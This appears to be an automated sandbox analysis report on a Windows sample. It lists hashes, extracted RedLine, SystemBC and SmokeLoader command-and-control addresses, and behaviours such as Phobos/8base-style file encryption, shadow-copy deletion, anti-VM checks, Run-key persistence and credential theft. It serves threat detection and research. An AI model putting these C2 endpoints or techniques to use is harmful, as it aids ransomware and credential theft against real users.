Analysis
-
max time kernel
123s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
25-06-2023 06:54
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230621-en
General
-
Target
file.exe
-
Size
288KB
-
MD5
6ae917525435e23b07d15537fb40aea0
-
SHA1
7c85b447bb5608ba7fb6a332c033c0cdad0430ae
-
SHA256
160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
-
SHA512
23e5f94e964d53d72af0d6ad31da309539116a9963806ce7b0d3c028a69ab343df6cd6f3989b280e70a285395425a1cb93492fe5030968558ada5f7de047aaed
-
SSDEEP
6144:Ft+WQdzUUPFTf2HHvKlHQho0jT21v3Ifz/x2ShelxPcWpv:61oqm+QbjTIwr/l00m
Malware Config
Extracted
redline
1
dexstat255.xyz:46578
-
auth_value
c4805fc19583231a4c5bb64b0e833716
Extracted
systembc
adstat277xm.xyz:4044
demstat377xm.xyz:4044
Extracted
smokeloader
2022
http://serverlogs37.xyz/statweb255/
http://servblog757.xyz/statweb255/
http://dexblog45.xyz/statweb255/
http://admlogs.online/statweb255/
http://blogstat355.xyz/statweb255/
http://blogstatserv25.xyz/statweb255/
Signatures
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
547C.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 547C.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4320 bcdedit.exe 372 bcdedit.exe -
Renames multiple (371) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 24 2176 powershell.exe -
Processes:
wbadmin.exepid process 3488 wbadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
547C.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 547C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 547C.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sv.bat.exe547C.exeSRD.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation sv.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation 547C.exe Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation SRD.bat.exe -
Drops startup file 1 IoCs
Processes:
3EBF.exedescription ioc process File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\3EBF.exe 3EBF.exe -
Executes dropped EXE 11 IoCs
Processes:
ldx999sx.exes777mx.exeldx999sx.exe3C2E.exe3EBF.exe42D7.exe3EBF.exe547C.exe547C.exeSRD.bat.exesv.bat.exepid process 1856 ldx999sx.exe 3420 s777mx.exe 3428 ldx999sx.exe 2992 3C2E.exe 3280 3EBF.exe 4152 42D7.exe 556 3EBF.exe 1424 547C.exe 3852 547C.exe 4112 SRD.bat.exe 2024 sv.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
547C.exepid process 1424 547C.exe -
Obfuscated with Agile.Net obfuscator 4 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\547C.exe agile_net C:\Users\Admin\AppData\Local\Temp\547C.exe agile_net behavioral2/memory/1424-396-0x0000000000FF0000-0x000000000164E000-memory.dmp agile_net C:\Users\Admin\AppData\Local\Temp\547C.exe agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll themida C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll themida behavioral2/memory/1424-439-0x00000000707B0000-0x0000000070D90000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
3C2E.exe3EBF.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" 3C2E.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe" 3EBF.exe Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe" 3EBF.exe -
Processes:
547C.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 547C.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
3EBF.exedescription ioc process File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini 3EBF.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini 3EBF.exe File opened for modification C:\Program Files\desktop.ini 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 3EBF.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
Processes:
powershell.exepid process 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exeldx999sx.execmd.exedescription pid process target process PID 2176 set thread context of 4716 2176 powershell.exe aspnet_compiler.exe PID 1856 set thread context of 3428 1856 ldx999sx.exe ldx999sx.exe PID 1424 set thread context of 3852 1424 cmd.exe 547C.exe -
Drops file in Program Files directory 64 IoCs
Processes:
3EBF.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg 3EBF.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-256.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-LTR.gif 3EBF.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png 3EBF.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-125.png 3EBF.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-922299981-3641064733-3870770889-1000-MergedResources-0.pri 3EBF.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js 3EBF.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll 3EBF.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.ot 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d5.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-30.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_altform-unplated_contrast-white.png 3EBF.exe File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll 3EBF.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui 3EBF.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-high.png 3EBF.exe File created C:\Program Files\Microsoft Office\root\vfs\System\msvcr110.dll.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-200_contrast-black.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ColorVertexShader.cso 3EBF.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js 3EBF.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe 3EBF.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-pl.xrm-ms 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat 3EBF.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-16_altform-unplated.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32_altform-unplated.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-72_altform-unplated.png 3EBF.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml 3EBF.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll 3EBF.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIF.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-200.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100_contrast-high.png 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-pl.xrm-ms 3EBF.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_ecc.dll 3EBF.exe File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-16.png 3EBF.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-lightunplated.png 3EBF.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll 3EBF.exe File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dll.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\SignInControl.xaml 3EBF.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml.id[CF072F13-3483].[[email protected]].8base 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] 3EBF.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLL 3EBF.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail-Dark.scale-150.png 3EBF.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsnor.xml 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-400.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-60.png 3EBF.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-100.png 3EBF.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 1308 556 WerFault.exe 3EBF.exe 3344 4152 WerFault.exe 42D7.exe -
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exeldx999sx.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ldx999sx.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ldx999sx.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ldx999sx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2860 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepid process 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3292 -
Suspicious behavior: MapViewOfSection 31 IoCs
Processes:
ldx999sx.exepid process 3428 ldx999sx.exe 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 3292 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeaspnet_compiler.exe3EBF.exevssvc.exe3C2E.exeWMIC.exewbengine.exedescription pid process Token: SeDebugPrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeDebugPrivilege 4716 aspnet_compiler.exe Token: SeShutdownPrivilege 3292 Token: SeCreatePagefilePrivilege 3292 Token: SeShutdownPrivilege 3292 Token: SeCreatePagefilePrivilege 3292 Token: SeDebugPrivilege 3280 3EBF.exe Token: SeBackupPrivilege 4908 vssvc.exe Token: SeRestorePrivilege 4908 vssvc.exe Token: SeAuditPrivilege 4908 vssvc.exe Token: SeDebugPrivilege 2992 3C2E.exe Token: SeShutdownPrivilege 3292 Token: SeCreatePagefilePrivilege 3292 Token: SeIncreaseQuotaPrivilege 2156 WMIC.exe Token: SeSecurityPrivilege 2156 WMIC.exe Token: SeTakeOwnershipPrivilege 2156 WMIC.exe Token: SeLoadDriverPrivilege 2156 WMIC.exe Token: SeSystemProfilePrivilege 2156 WMIC.exe Token: SeSystemtimePrivilege 2156 WMIC.exe Token: SeProfSingleProcessPrivilege 2156 WMIC.exe Token: SeIncBasePriorityPrivilege 2156 WMIC.exe Token: SeCreatePagefilePrivilege 2156 WMIC.exe Token: SeBackupPrivilege 2156 WMIC.exe Token: SeRestorePrivilege 2156 WMIC.exe Token: SeShutdownPrivilege 2156 WMIC.exe Token: SeDebugPrivilege 2156 WMIC.exe Token: SeSystemEnvironmentPrivilege 2156 WMIC.exe Token: SeRemoteShutdownPrivilege 2156 WMIC.exe Token: SeUndockPrivilege 2156 WMIC.exe Token: SeManageVolumePrivilege 2156 WMIC.exe Token: 33 2156 WMIC.exe Token: 34 2156 WMIC.exe Token: 35 2156 WMIC.exe Token: 36 2156 WMIC.exe Token: SeIncreaseQuotaPrivilege 2156 WMIC.exe Token: SeSecurityPrivilege 2156 WMIC.exe Token: SeTakeOwnershipPrivilege 2156 WMIC.exe Token: SeLoadDriverPrivilege 2156 WMIC.exe Token: SeSystemProfilePrivilege 2156 WMIC.exe Token: SeSystemtimePrivilege 2156 WMIC.exe Token: SeProfSingleProcessPrivilege 2156 WMIC.exe Token: SeIncBasePriorityPrivilege 2156 WMIC.exe Token: SeCreatePagefilePrivilege 2156 WMIC.exe Token: SeBackupPrivilege 2156 WMIC.exe Token: SeRestorePrivilege 2156 WMIC.exe Token: SeShutdownPrivilege 2156 WMIC.exe Token: SeDebugPrivilege 2156 WMIC.exe Token: SeSystemEnvironmentPrivilege 2156 WMIC.exe Token: SeRemoteShutdownPrivilege 2156 WMIC.exe Token: SeUndockPrivilege 2156 WMIC.exe Token: SeManageVolumePrivilege 2156 WMIC.exe Token: 33 2156 WMIC.exe Token: 34 2156 WMIC.exe Token: 35 2156 WMIC.exe Token: 36 2156 WMIC.exe Token: SeBackupPrivilege 3928 wbengine.exe Token: SeRestorePrivilege 3928 wbengine.exe Token: SeSecurityPrivilege 3928 wbengine.exe Token: SeShutdownPrivilege 3292 Token: SeCreatePagefilePrivilege 3292 Token: SeDebugPrivilege 2992 3C2E.exe Token: SeShutdownPrivilege 3292 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exepowershell.exeaspnet_compiler.exeldx999sx.exe3EBF.execmd.execmd.exedescription pid process target process PID 2228 wrote to memory of 2176 2228 file.exe powershell.exe PID 2228 wrote to memory of 2176 2228 file.exe powershell.exe PID 2228 wrote to memory of 2176 2228 file.exe powershell.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 2176 wrote to memory of 4716 2176 powershell.exe aspnet_compiler.exe PID 4716 wrote to memory of 1856 4716 aspnet_compiler.exe ldx999sx.exe PID 4716 wrote to memory of 1856 4716 aspnet_compiler.exe ldx999sx.exe PID 4716 wrote to memory of 1856 4716 aspnet_compiler.exe ldx999sx.exe PID 4716 wrote to memory of 3420 4716 aspnet_compiler.exe s777mx.exe PID 4716 wrote to memory of 3420 4716 aspnet_compiler.exe s777mx.exe PID 4716 wrote to memory of 3420 4716 aspnet_compiler.exe s777mx.exe PID 1856 wrote to memory of 3428 1856 ldx999sx.exe ldx999sx.exe PID 1856 wrote to memory of 3428 1856 ldx999sx.exe ldx999sx.exe PID 1856 wrote to memory of 3428 1856 ldx999sx.exe ldx999sx.exe PID 1856 wrote to memory of 3428 1856 ldx999sx.exe ldx999sx.exe PID 1856 wrote to memory of 3428 1856 ldx999sx.exe ldx999sx.exe PID 1856 wrote to memory of 3428 1856 ldx999sx.exe ldx999sx.exe PID 3292 wrote to memory of 2992 3292 3C2E.exe PID 3292 wrote to memory of 2992 3292 3C2E.exe PID 3292 wrote to memory of 3280 3292 3EBF.exe PID 3292 wrote to memory of 3280 3292 3EBF.exe PID 3292 wrote to memory of 3280 3292 3EBF.exe PID 3292 wrote to memory of 4152 3292 42D7.exe PID 3292 wrote to memory of 4152 3292 42D7.exe PID 3292 wrote to memory of 4152 3292 42D7.exe PID 3292 wrote to memory of 1424 3292 547C.exe PID 3292 wrote to memory of 1424 3292 547C.exe PID 3292 wrote to memory of 1424 3292 547C.exe PID 3292 wrote to memory of 4248 3292 explorer.exe PID 3292 wrote to memory of 4248 3292 explorer.exe PID 3292 wrote to memory of 4248 3292 explorer.exe PID 3292 wrote to memory of 4248 3292 explorer.exe PID 3280 wrote to memory of 4988 3280 3EBF.exe cmd.exe PID 3280 wrote to memory of 4988 3280 3EBF.exe cmd.exe PID 3280 wrote to memory of 4980 3280 3EBF.exe cmd.exe PID 3280 wrote to memory of 4980 3280 3EBF.exe cmd.exe PID 3292 wrote to memory of 1644 3292 explorer.exe PID 3292 wrote to memory of 1644 3292 explorer.exe PID 3292 wrote to memory of 1644 3292 explorer.exe PID 3292 wrote to memory of 4256 3292 explorer.exe PID 3292 wrote to memory of 4256 3292 explorer.exe PID 3292 wrote to memory of 4256 3292 explorer.exe PID 3292 wrote to memory of 4256 3292 explorer.exe PID 3292 wrote to memory of 4940 3292 explorer.exe PID 3292 wrote to memory of 4940 3292 explorer.exe PID 3292 wrote to memory of 4940 3292 explorer.exe PID 3292 wrote to memory of 4940 3292 explorer.exe PID 4980 wrote to memory of 1776 4980 cmd.exe netsh.exe PID 4980 wrote to memory of 1776 4980 cmd.exe netsh.exe PID 4988 wrote to memory of 2860 4988 cmd.exe vssadmin.exe PID 4988 wrote to memory of 2860 4988 cmd.exe vssadmin.exe PID 3292 wrote to memory of 4500 3292 explorer.exe PID 3292 wrote to memory of 4500 3292 explorer.exe PID 3292 wrote to memory of 4500 3292 explorer.exe PID 3292 wrote to memory of 4500 3292 explorer.exe PID 3292 wrote to memory of 544 3292 explorer.exe PID 3292 wrote to memory of 544 3292 explorer.exe PID 3292 wrote to memory of 544 3292 explorer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
